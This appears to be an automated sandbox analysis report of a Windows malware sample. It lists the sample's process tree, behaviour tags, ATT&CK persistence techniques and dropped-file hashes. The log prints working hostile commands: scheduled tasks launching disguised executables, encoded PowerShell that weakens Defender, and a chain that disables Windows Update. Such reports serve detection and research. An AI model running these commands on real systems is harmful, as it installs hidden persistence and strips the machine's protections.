C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Users\Public\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Public\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\Users\Public\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Favorites\Links\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\Favorites\Links\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Favorites\Links\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\odt\RuntimeBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\odt\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "brokerHostmonitorb" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\brokerHostmonitor.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "brokerHostmonitor" /sc ONLOGON /tr "'C:\Users\Default User\brokerHostmonitor.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "brokerHostmonitorb" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\brokerHostmonitor.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AntiVpsProtectorA" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\AntiVpsProtector.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AntiVpsProtector" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\AntiVpsProtector.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "AntiVpsProtectorA" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\AntiVpsProtector.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\backgroundTaskHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Default User\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Default User\backgroundTaskHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "IdleI" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Idle.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updaterchr.exe"C:\Program Files\Google\Chrome\updaterchr.exe"1⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwBuAGgAcQBrACMAPgAgAEAAKAAgADwAIwBtAHcAdAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAaQBqAGEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAbABkAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgBlAGcAIwA+AA=="2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZQBrACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAGMAaAByAC4AZQB4AGUAIgAnACkAIAA8ACMAawBmAHEAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBpAGYAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBiAHIAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBHAE4AQwAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGsAdgBrAHUAIwA+ADsA"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "bosjczbpam"2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe lhjhhfereinutqkk0 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUJUDxpO3xQsm1i/s1JWMxbg4CDDUjUzNRskPjZWvNKNodOgKV2HJ8tTN0QVJgDyg+2bViTlti9ZxC5n49dcOUKQgK8rh3k8SmDF6+u9ZQ5hRhwXNv/1S1TKEHJpFva5VT15ywFxRzv+p6QJjNw/L6ZZoe3/92cs2DQxDkoE3IsIzkx9TTRmCLGdVqAhSSaqD/gWCF8syjnqONW8nAkIDCaiX6JyJkuCgTuOQv8CpGeKv1VALuliP/ha8Yjhtr6HMGk2rtUy+qneh6aJBuRE2Vl54snxeUp5YsY49VDdIyEysvbl9BsEUC35mC2kOBCmxC0JxCaQIXPdfkaqqK0slLenN1msO3trj6XDK8r1gefSJa5eSdUWn80xUbCsMx+vSBw/fgeBKOpIbO3PFsHY47GpDwiBS4J/sfvFzm9Z81e/R0fe5W8jG0UPs4d7gICDhbEElYG2jSwHbK0S6OPBDvA3oFTND9PNmzn3LH3zqfX+FjpyLAxPdNktvAJH72zq+MPDCIF7jYmQ5wBcD3ROPUkA==2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}1⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Users\Default User\backgroundTaskHost.exe"C:\Users\Default User\backgroundTaskHost.exe"1⤵
- Executes dropped EXE
-
C:\Users\Default User\brokerHostmonitor.exe"C:\Users\Default User\brokerHostmonitor.exe"1⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\AntiVpsProtector.exeC:\Recovery\WindowsRE\AntiVpsProtector.exe1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"1⤵
- Executes dropped EXE
-
C:\odt\RuntimeBroker.exeC:\odt\RuntimeBroker.exe1⤵
- Executes dropped EXE
-
C:\Users\Default User\backgroundTaskHost.exe"C:\Users\Default User\backgroundTaskHost.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe"C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe"1⤵
- Executes dropped EXE
-
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe"1⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\Idle.exeC:\Recovery\WindowsRE\Idle.exe1⤵
- Executes dropped EXE
-
C:\Users\Public\fontdrvhost.exeC:\Users\Public\fontdrvhost.exe1⤵
- Executes dropped EXE
-
C:\Users\Default User\brokerHostmonitor.exe"C:\Users\Default User\brokerHostmonitor.exe"1⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\AntiVpsProtector.exeC:\Recovery\WindowsRE\AntiVpsProtector.exe1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"1⤵
- Executes dropped EXE
-
C:\Users\Default User\backgroundTaskHost.exe"C:\Users\Default User\backgroundTaskHost.exe"1⤵
- Executes dropped EXE
-
C:\odt\RuntimeBroker.exeC:\odt\RuntimeBroker.exe1⤵
- Executes dropped EXE
-
C:\Users\Default User\brokerHostmonitor.exe"C:\Users\Default User\brokerHostmonitor.exe"1⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\AntiVpsProtector.exeC:\Recovery\WindowsRE\AntiVpsProtector.exe1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe"C:\Program Files (x86)\WindowsPowerShell\Configuration\Registration\sppsvc.exe"1⤵
- Executes dropped EXE
-
C:\Users\Default User\backgroundTaskHost.exe"C:\Users\Default User\backgroundTaskHost.exe"1⤵
- Executes dropped EXE
-
C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe"C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\es\sihost.exe"1⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\Idle.exeC:\Recovery\WindowsRE\Idle.exe1⤵
- Executes dropped EXE
-
C:\Users\Public\fontdrvhost.exeC:\Users\Public\fontdrvhost.exe1⤵
- Executes dropped EXE
-
C:\Users\Default User\brokerHostmonitor.exe"C:\Users\Default User\brokerHostmonitor.exe"1⤵
- Executes dropped EXE
-
C:\Recovery\WindowsRE\AntiVpsProtector.exeC:\Recovery\WindowsRE\AntiVpsProtector.exe1⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"C:\Program Files (x86)\Mozilla Maintenance Service\logs\OfficeClickToRun.exe"1⤵
- Executes dropped EXE
-
C:\Users\Default User\backgroundTaskHost.exe"C:\Users\Default User\backgroundTaskHost.exe"1⤵
- Executes dropped EXE
-
C:\odt\RuntimeBroker.exeC:\odt\RuntimeBroker.exe1⤵
- Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Persistence
Change Default File Association
1Hidden Files and Directories
1Modify Existing Service
2Registry Run Keys / Startup Folder
2Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.7MB
MD5d8b0141fa74010a7cb1b769d5889a0d9
SHA1446c94944b01641d720936f17fa175b96d9fda4f
SHA256f1e9b18d6ad56f0f41763e153dd62311a3d39ae798ee5fbec78f597cceeffa71
SHA512478fc09eb80c5f8237a1dee87080bad6d0ff331c4ef3d5fd1977d0bce0644c006dafbd0c0486bde240f8b0fa06193dbd58c9e188ad72e1ee20998bdf3f4c48be
-
Filesize
2.7MB
MD5d8b0141fa74010a7cb1b769d5889a0d9
SHA1446c94944b01641d720936f17fa175b96d9fda4f
SHA256f1e9b18d6ad56f0f41763e153dd62311a3d39ae798ee5fbec78f597cceeffa71
SHA512478fc09eb80c5f8237a1dee87080bad6d0ff331c4ef3d5fd1977d0bce0644c006dafbd0c0486bde240f8b0fa06193dbd58c9e188ad72e1ee20998bdf3f4c48be
-
Filesize
50B
MD5a1f0be6d4d131a449557b25ea6e7411a
SHA1466a3cbee5f9b6b6ef6c4d36bdfee093a27196a0
SHA25651c5c30002198d42adfac83fc0d7b47f6602d63648c14b01890b77ea926c4672
SHA512e24f0a5ba880461001b5a912e42b5ecace58b91cec48e822c9f3bbfa456afede057992ea6b67321feba7573c18ec7fefc3629b5bc5fe08598431ef0d3f9d8185
-
Filesize
218B
MD5906571d6969cc4cfedb0bbe57429189e
SHA130f2674c4965024a9dd4af1b0d677a7aaef9823f
SHA25653adbfea3c5d2f7a1033781ac806932ed6d3506477cdf24a0c877a702d049640
SHA5129e8b84b5a8b64e5e43cdaae2dda9aa05bd6c727c76f52328c49f0657d479a022a300e3313919c191aa4d820e50a09c5d7f61349abb23fdb48858f363a15000b6
-
Filesize
4.3MB
MD5de0c1cad99b50eb867f1bfb11198f735
SHA1b6de7ae80c7ec968856f1a2e51c13bd10d6564cb
SHA25633f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727
SHA512b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95
-
Filesize
4.3MB
MD5de0c1cad99b50eb867f1bfb11198f735
SHA1b6de7ae80c7ec968856f1a2e51c13bd10d6564cb
SHA25633f6aec65985b835bbf89462fd2d15b513bd7b7ba2c9295a36ab34f6faf7b727
SHA512b2cc3c62689461016e0e1a0b16b87f51f8f3d4a5eec4a2d5da60315a94a43ee9851c904805ebb9b851c670181585d27051b1935c26ad0c4a90947c3b7acc0b95
-
Filesize
2.7MB
MD5890c98ec5e3d6c674acfe7f7fa3c9ec6
SHA179b1ff30d21cdaecb1022c4a64e746469adc3746
SHA256f8a3394fab1d554d0241030ac217e487f492ae97ca2c318ae65ee9d245ba9179
SHA51211e1a4d58b63cde39435c276c75f2da32e1c1ef4ecaf4d51bbf65676406bb5825523661521d51d4dad894b859e06bad4fcdee142e0a8629c04cbfab8e5d42688
-
Filesize
2.7MB
MD5890c98ec5e3d6c674acfe7f7fa3c9ec6
SHA179b1ff30d21cdaecb1022c4a64e746469adc3746
SHA256f8a3394fab1d554d0241030ac217e487f492ae97ca2c318ae65ee9d245ba9179
SHA51211e1a4d58b63cde39435c276c75f2da32e1c1ef4ecaf4d51bbf65676406bb5825523661521d51d4dad894b859e06bad4fcdee142e0a8629c04cbfab8e5d42688
-
Filesize
1KB
MD50e68a3d09904764024488abec3d50069
SHA1a73d5b9e6c43487c461445dabd8369dcb9b2cf46
SHA256507ab3c21ed1fe391a0892031ddc850302be9790a470910e96ffcdee43387a9f
SHA5129627b0667678e2fe69e1bab6cfe763e4d649f11f4f9d6a3abdcba47d732d35902bb7b5c06d948d13f0e4c552433272ed95462788cb908f7b76637072c0eb7117
-
Filesize
471B
MD5fd91399db8d00aa671fdecca6812fe4e
SHA1048482634c7c59789caadde2cc9e8b361566ee97
SHA256652f1da363331908110f4d93eb3e01bd91e841ed9dfd734b5fcfd563bb15b963
SHA51212808098b5889898379c4cb4bf6e6c9c5ac9abb1c78f837b219d6a4bafdf149111ad56c6a90fb301f8caf891fde6b5f54cf7658a48255a5f225cdac08f9a90f2
-
Filesize
446B
MD5fcc392f9a81602e7c746ff0e1ee5f4a4
SHA129e39daee65e33faf965abce207eb5efa386526d
SHA2563eab1a5b68530cfe7f5ab084177abc61c733fff606489319346feacb91ab41fa
SHA51202b5a569f4b008a0e3a310f8f66e0f36283fddda91f18b04e0dfea1d931f5092112c3c22df421853bd7a0bf8a2027ad2dd0688ddec36b27fa9920e40ce7fc5fb
-
Filesize
442B
MD5bcf85418b064e3e67c9d340104c17b0a
SHA105929ac07f0cb680e1d52f5ffc966d745514d848
SHA25615009972443d1267cbe3af4236f2a1f216021dba300036db9c5da057f606f9c3
SHA512e6a1f033b81250f4e200f41ac5c3dac1f0a7729e775d963cef689889f043dd6d568fb3c4639c61f6fad1f885008c90b81f6c6d80ed2f67f808710aef8d36d199
-
Filesize
425B
MD5fff5cbccb6b31b40f834b8f4778a779a
SHA1899ed0377e89f1ed434cfeecc5bc0163ebdf0454
SHA256b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76
SHA5121a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
553KB
MD557bd9bd545af2b0f2ce14a33ca57ece9
SHA115b4b5afff9abba2de64cbd4f0989f1b2fbc4bf1
SHA256a3a4b648e4dcf3a4e5f7d13cc3d21b0353e496da75f83246cc8a15fada463bdf
SHA512d134f9881312ddbd0d61f39fd62af5443a4947d3de010fef3b0f6ebf17829bd4c2f13f6299d2a7aad35c868bb451ef6991c5093c2809e6be791f05f137324b39
-
Filesize
504KB
